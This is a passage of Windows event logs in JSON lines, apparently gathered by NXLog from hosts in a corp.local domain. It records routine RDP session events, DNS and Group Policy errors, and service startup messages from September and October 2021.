required.","Opcode":"Info","NameLength":"53","Name":"\\DEVICE\\TCPIP6_{93214454-281b-4dbb-bf1a-2b7b93a412ab}","IfIndex":"12","EventReceivedTime":"2021-09-21T14:21:58.137122+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.495457+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":135,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23816,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1332,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The multi-transport connection finished for tunnel: 1, its transport type set to TCP: Reason Code: 1 (No Client UDP Support).","Category":"RemoteFX module","Opcode":"EstablishConnection","TunnelID":"1","TransportType":"TCP: Reason Code: 1 (No Client UDP Support)","EventReceivedTime":"2021-09-21T14:23:58.858489+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:17.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5211,"SourceName":"Microsoft-Windows-WAS","ProviderGuid":"{524B5D04-133C-4A62-8362-64E8EDB9CE40}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":645222,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The Windows Process Activation Service (WAS) started with 'Classic' mode using 'ConfigurationSystem'","RunningMode":"Classic","ConfigurationReader":"ConfigurationSystem","EventReceivedTime":"2021-09-21T14:21:58.090244+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:19.889322+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5611,"SourceName":"Microsoft-Windows-WMI","ProviderGuid":"{1EDEEE53-0AFE-4609-B846-D8C0B2075B1F}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":119371,"ExecutionProcessID":912,"ExecutionThreadID":1248,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The Windows Management Instrumentation service has detected an inconsistent system shutdown.","Opcode":"Info","EventData":"","EventReceivedTime":"2021-09-21T14:21:58.121548+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:30.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1008,"SourceName":"Microsoft-Windows-Perflib","ProviderGuid":"{13B197BD-7CEE-4B4E-8DD0-59314CE374CE}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":119375,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Open Procedure for service \"BITS\" in DLL \"C:\\Windows\\System32\\bitsperf.dll\" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.","UserData":"<EventXML xmlns='Perflib'><param1>BITS</param1><param2>C:\\Windows\\System32\\bitsperf.dll</param2><binaryDataSize>8</binaryDataSize><binaryData>0200000000000000</binaryData></EventXML>","EventReceivedTime":"2021-09-21T14:21:58.168368+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:56.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":6006,"SourceName":"Microsoft-Windows-Winlogon","ProviderGuid":"{DBE9B383-7CF3-4331-91CC-A3CB16A3B538}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":119381,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The winlogon notification subscriber <GPClient> took 64 second(s) to handle the notification event (CreateSession).","EventData":"<Data>GPClient</Data><Data>64</Data><Data>CreateSession</Data><Binary>04000000</Binary>","EventReceivedTime":"2021-09-21T14:21:58.308992+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:53.738177+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":30800,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1290,"ExecutionProcessID":4,"ExecutionThreadID":464,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The server name cannot be resolved.\r\n\r\nError: The object was not found.\r\n\r\nServer name: corp.local\r\n\r\nGuidance:\r\nThe client cannot resolve the server address in DNS or WINS. This issue often manifests immediately after joining a computer to the domain, when the client's DNS registration may not yet have propagated to all DNS servers. You should also expect this event at system startup on a DNS server (such as a domain controller) that points to itself for the primary DNS. You should validate the DNS client settings on this computer using IPCONFIG /ALL and NSLOOKUP.","Opcode":"Info","Reason":"1","Status":"3221226021","ServerNameLength":"19","ServerName":"corp.local","EventReceivedTime":"2021-09-21T14:21:58.277751+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:20.311199+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4200,"SourceName":"Microsoft-Windows-Iphlpsvc","ProviderGuid":"{66A5C15C-4F8E-4044-BF6E-71D896038977}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":645239,"ExecutionProcessID":912,"ExecutionThreadID":2008,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Isatap interface isatap.{48B8E372-14A4-40C0-9732-C046D6CCC5CD} with address fe80::5efe:192.168.2.47 has been brought up.","Opcode":"Info","ProtocolType":"1","Interface":"isatap.{48B8E372-14A4-40C0-9732-C046D6CCC5CD}","Address":"fe80::5efe:192.168.2.47","EventReceivedTime":"2021-09-21T14:21:58.137122+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:16.670582+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":143,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":645225,"ExecutionProcessID":940,"ExecutionThreadID":1768,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has started advertising as a good time source.","Opcode":"Info","EventReceivedTime":"2021-09-21T14:21:58.090244+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:35:53.729610+05:45","Hostname":"IT01.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4111,"SourceName":"Microsoft-Windows-CAPI2","ProviderGuid":"{5BBCA4A8-B209-48DC-A8C7-B23D3E5216FB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":13072,"ExecutionProcessID":1264,"ExecutionThreadID":6800,"Channel":"Application","Message":"Successful auto update of third-party root list with effective date: ???Friday, ???September ???10, ???2021 9:54:29 PM.","Opcode":"Info","Data":"???Friday, ???September ???10, ???2021 9:54:29 PM","EventReceivedTime":"2021-09-21T14:23:59.967874+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:28:56.420828+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5478,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12291,"OpcodeValue":0,"RecordNumber":4046569,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":5732,"Channel":"Security","Message":"The IPsec Policy Agent service was started.","Category":"IPsec Driver","Opcode":"Info","EventReceivedTime":"2021-09-21T14:23:59.420991+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.642405+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":66,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":13,"RecordNumber":23820,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1428,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The connection RDP-Tcp#7 was assigned to session 2","Category":"RemoteFX module","Opcode":"RCMProtocolImpl","ConnectionName":"RDP-Tcp#7","SessionID":"2","EventReceivedTime":"2021-09-21T14:23:58.858489+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:55.610612+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":65,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":13,"RecordNumber":23799,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1304,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Connection RDP-Tcp#7 created ","Category":"RemoteFX module","Opcode":"RCMProtocolImpl","ConnectionName":"RDP-Tcp#7","EventReceivedTime":"2021-09-21T14:23:58.842866+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T11:29:34.917615+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1054,"SourceName":"Microsoft-Windows-GroupPolicy","ProviderGuid":"{AEA1B4FA-97D1-45F2-A64C-4D69FFFD92C9}","Version":0,"TaskValue":0,"OpcodeValue":1,"RecordNumber":108893,"ActivityID":"{0551BACE-C2F9-4DF1-BC76-C71E60B0C2B5}","ExecutionProcessID":1520,"ExecutionThreadID":372,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The processing of Group Policy failed. Windows could not obtain the name of a domain controller. This could be caused by a name resolution failure. Verify your Domain Name System (DNS) is configured and working correctly.","Opcode":"Start","SupportInfo1":"1","SupportInfo2":"2847","ProcessingMode":"0","ProcessingTimeInMilliseconds":"0","ErrorCode":"1355","ErrorDescription":"The specified domain either does not exist or could not be contacted. ","EventReceivedTime":"2021-09-21T14:22:02.012139+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T00:25:46.924083+05:45","Hostname":"ACC01","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":8016,"SourceName":"Microsoft-Windows-DNS-Client","ProviderGuid":"{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}","Version":0,"TaskValue":1028,"OpcodeValue":0,"RecordNumber":56634,"ExecutionProcessID":1348,"ExecutionThreadID":2184,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The system failed to register host (A or AAAA) resource records (RRs) for network adapter\r\nwith settings:\r\n\r\n           Adapter Name : {0CAD76ED-84FA-4588-9F25-B4D5BC9EBE1E}\r\n           Host Name : ACC01\r\n           Primary Domain Suffix : prod.corp.local\r\n           DNS server list :\r\n             \t192.168.4.203, 8.8.8.8\r\n           Sent update to server : <?>\r\n           IP Address(es) :\r\n             192.168.4.204\r\n\r\nThe reason the system could not register these RRs was because the DNS server failed the update request. The most likely cause of this is that the authoritative DNS server required to process this update request has a lock in place on the zone, probably because a zone transfer is in progress.\r\n\r\nYou can manually retry DNS registration of the network adapter and its settings by typing 'ipconfig /registerdns' at the command prompt. If problems still persist, contact your DNS server or network systems administrator.","Opcode":"Info","AdapterName":"{0CAD76ED-84FA-4588-9F25-B4D5BC9EBE1E}","AdapterSuffixName":"prod.corp.local","DnsServerList":"\t192.168.4.203, 8.8.8.8","Sent UpdateServer":"<?>","Ipaddress":"192.168.4.204","ErrorCode":"9002","EventReceivedTime":"2021-10-02T00:25:48.455295+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:15:16.601262+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":229,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23700,"ActivityID":"{F462869C-F81B-462A-8936-3BBC82B90000}","ExecutionProcessID":1016,"ExecutionThreadID":668,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"'Creating standard listener:RDP-Tcp' in CUMRDPProtocolManager::CreateListener at 4161 err=[0x0]","Category":"RemoteFX module","Opcode":"Runtime","Name":"CUMRDPProtocolManager","CustomLevel":"'Creating standard listener:RDP-Tcp' in CUMRDPProtocolManager::CreateListener at 4161 err=[0x0]","EventReceivedTime":"2021-09-21T12:15:41.495882+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:21.206256+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":227,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23862,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":5388,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"'Failed CreateVirtualChannel call on this Connections Stack' in CUMRDPConnection::CreateVirtualChannel at 2622 err=[0xd0000001]","Category":"RemoteFX module","Opcode":"Runtime","Name":"CUMRDPConnection","Value":"3489660929","CustomLevel":"'Failed CreateVirtualChannel call on this Connections Stack' in CUMRDPConnection::CreateVirtualChannel at 2622 err=[0xd0000001]","EventReceivedTime":"2021-09-21T14:24:00.311619+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:15:16.651673+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":70,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":13,"RecordNumber":23702,"ActivityID":"{F462869C-F81B-462A-8936-3BBC82B90000}","ExecutionProcessID":1016,"ExecutionThreadID":668,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The listener listens with display driver rdpudd.dll available.","Category":"RemoteFX module","Opcode":"RCMProtocolImpl","DisplayDriverName":"rdpudd.dll","EventReceivedTime":"2021-09-21T12:15:41.495882+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.783767+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":72,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":13,"RecordNumber":23879,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1296,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Interface method called: OnDisconnected(server initiated)","Category":"RemoteFX module","Opcode":"RCMProtocolImpl","MethodName":"OnDisconnected(server initiated)","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:34:49.600351+05:45","Hostname":"IT01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":330,"SourceName":"ESENT","TaskValue":1,"RecordNumber":13061,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (564,D,50) DS_Token_DB: The database [C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSTokenDB2.dat] format version is being held back to 8920 (0x22d8) due to application parameter setting of 0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat). Current default engine version: 9100 (0x238c).","Category":"General","Opcode":"Info","Data":"svchost","Data_1":"564,D,50","Data_2":"DS_Token_DB: ","Data_3":"C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSTokenDB2.dat","Data_4":"0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat)","Data_5":"8920 (0x22d8)","Data_6":"9100 (0x238c)","EventReceivedTime":"2021-09-21T14:23:59.639730+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.760548+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":144,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23878,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":5388,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"TCP socket was gracefully terminated","Category":"RemoteFX module","Opcode":"EstablishConnection","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.749457+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":148,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":17,"RecordNumber":23874,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1296,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Channel rdpgrfx has been closed between the server and the client on transport tunnel: 0.","Category":"RemoteFX module","Opcode":"CloseConnection","ChannelName":"rdpgrfx","TunnelID":"0","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:55.618707+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":141,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":11,"RecordNumber":23802,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3744,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"PerfCounter session started with instance ID 7","Category":"RemoteFX module","Opcode":"Initialize","InstanceID":"7","EventReceivedTime":"2021-09-21T14:23:58.842866+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.744984+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":103,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":17,"RecordNumber":23873,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3236,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The disconnect reason is 12","Category":"RemoteFX module","Opcode":"CloseConnection","ReasonCode":"12","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:55.606887+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":131,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23798,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1320,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The server accepted a new TCP connection from client 172.16.20.11:64184.","Category":"RemoteFX module","Opcode":"EstablishConnection","ConnType":"TCP","ClientIP":"172.16.20.11:64184","EventReceivedTime":"2021-09-21T14:23:58.842866+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:34:49.600351+05:45","Hostname":"IT01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":641,"SourceName":"ESENT","TaskValue":1,"RecordNumber":13062,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (564,D,50) DS_Token_DB: The log format feature version 8940 (0x22ec - 8.6.20) could not be used due to the current log format 8.5.16, controlled by the parameter 0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat).","Category":"General","Opcode":"Info","Data":"svchost","Data_1":"564,D,50","Data_2":"DS_Token_DB: ","Data_3":"0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat)","Data_4":"8940 (0x22ec - 8.6.20)","Data_5":"8.5.16","EventReceivedTime":"2021-09-21T14:23:59.639730+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.783901+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":145,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23881,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1296,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"During this connection, server has not sent data or graphics update for 0 seconds (Idle1: 0, Idle2: 0).","Category":"RemoteFX module","Opcode":"Runtime","IdleSeconds":"0","IdleSeconds1":"0","IdleSeconds2":"0","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:21.206005+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":132,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23860,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3236,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"A channel Microsoft::Windows::RDS::Geometry::v08.01 has been connected between the server and the client using transport tunnel: 0.","Category":"RemoteFX module","Opcode":"EstablishConnection","ChannelName":"Microsoft::Windows::RDS::Geometry::v08.01","TunnelID":"0","EventReceivedTime":"2021-09-21T14:24:00.311619+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.393151+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":104,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23808,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3744,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Client timezone is [5] hour from UTC; ","Category":"RemoteFX module","Opcode":"EstablishConnection","TimezoneBiasHour":[5],"EventReceivedTime":"2021-09-21T14:23:58.842866+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.664163+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":33,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":11,"RecordNumber":23821,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1428,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Remote Desktop Protocol will use the RemoteFX guest mode module to connect to the client computer.","Category":"RemoteFX module","Opcode":"Initialize","EventReceivedTime":"2021-09-21T14:23:58.858489+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
